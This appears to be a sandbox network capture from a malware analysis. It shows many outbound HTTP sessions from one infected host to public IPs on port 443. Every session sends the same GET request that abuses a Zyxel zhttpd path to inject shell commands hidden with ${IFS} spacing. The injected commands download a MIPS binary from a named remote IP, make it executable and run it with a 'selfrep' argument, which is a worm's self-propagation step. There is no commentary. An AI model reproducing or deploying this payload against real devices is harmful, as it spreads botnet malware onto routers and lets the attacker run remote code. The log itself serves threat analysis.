                                                  Jan 19, 2024 18:23:59.125416994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5203192.168.2.135767661.19.24.19443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125464916 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5204192.168.2.1348988144.90.48.136443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125514030 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5205192.168.2.1358760188.149.7.155443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125550032 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5206192.168.2.134067684.37.150.186443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125592947 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5207192.168.2.1352038103.8.79.251443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125627995 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5208192.168.2.1357760166.120.57.172443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125675917 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5209192.168.2.134770065.237.242.193443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125700951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5210192.168.2.134566468.76.86.99443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125761986 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5211192.168.2.1346834113.83.251.159443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125797987 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5212192.168.2.1342036102.183.237.22443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125840902 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5213192.168.2.135950052.55.151.157443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125874043 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5214192.168.2.134281073.190.11.237443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125938892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5215192.168.2.133422448.230.6.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.125967979 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5216192.168.2.1352956163.169.7.43443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126002073 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5217192.168.2.1343206162.13.123.101443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126039982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5218192.168.2.133950688.239.225.227443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126087904 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5219192.168.2.134922080.98.154.115443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126116991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5220192.168.2.135449080.71.32.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126148939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5221192.168.2.134347095.87.60.131443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126193047 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5222192.168.2.134993499.85.233.188443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126238108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5223192.168.2.1345464163.103.55.209443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126285076 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5224192.168.2.13501745.186.157.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126324892 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5225192.168.2.1350156182.71.46.218443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126354933 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5226192.168.2.134592214.52.249.44443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126430035 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5227192.168.2.1356928222.21.182.122443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126451969 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5228192.168.2.134264698.211.227.34443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126487970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5229192.168.2.1336358165.182.47.48443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126533985 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5230192.168.2.1351042110.195.17.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126580000 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5231192.168.2.1337160147.41.188.156443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126610994 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5232192.168.2.1334318106.10.181.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126663923 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5233192.168.2.135694243.218.118.0443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126697063 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5234192.168.2.1355736133.213.34.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126761913 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5235192.168.2.1343454182.236.117.226443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126807928 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5236192.168.2.134712064.16.174.98443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126836061 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5237192.168.2.135995051.125.133.214443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126868963 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5238192.168.2.135645843.161.205.94443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126907110 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5239192.168.2.1346616102.246.209.82443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.126959085 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5240192.168.2.1353108162.180.10.232443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127005100 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5241192.168.2.1351764114.224.144.9443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127046108 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5242192.168.2.1339810112.51.227.212443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127089977 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5243192.168.2.135463259.50.233.245443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127140999 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5244192.168.2.1354358122.26.207.145443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127173901 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5245192.168.2.134506031.61.144.21443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127211094 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5246192.168.2.133456499.228.55.149443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127250910 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5247192.168.2.1355226145.166.193.113443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127300978 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5248192.168.2.133341074.135.117.133443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127342939 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5249192.168.2.1351816212.156.166.78443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127378941 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5250192.168.2.135397673.228.47.246443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127414942 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5251192.168.2.1350954114.142.176.196443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127446890 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5252192.168.2.1347848180.205.1.203443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127485991 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5253192.168.2.133813045.219.5.217443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127530098 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5254192.168.2.1348432221.34.171.103443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127569914 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5255192.168.2.133641244.23.240.106443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127619982 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5256192.168.2.1338830146.57.227.90443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127655983 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5257192.168.2.1352198129.5.206.240443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127702951 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5258192.168.2.136040414.99.158.33443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127762079 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5259192.168.2.1342534100.192.159.182443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127773046 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5260192.168.2.134818866.151.33.66443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127813101 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5261192.168.2.1342474137.46.92.174443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127856970 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5262192.168.2.1353426158.211.6.211443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127891064 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5263192.168.2.1334424169.147.45.57443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127954006 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5264192.168.2.133905671.202.101.223443
                                                  TimestampBytes transferredDirectionData
                                                  Jan 19, 2024 18:23:59.127974033 CET203OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.146/huhu.mips;${IFS}chmod${IFS}777${IFS}huhu.mips;${IFS}./huhu.mips${IFS}zyxel.selfrep;


                                                  Session IDSource IPSource PortDestination IPDestination Port
                                                  5265192.168.2.135290868.206.32.67443
                                                  TimestampBytes transferredDirectionData
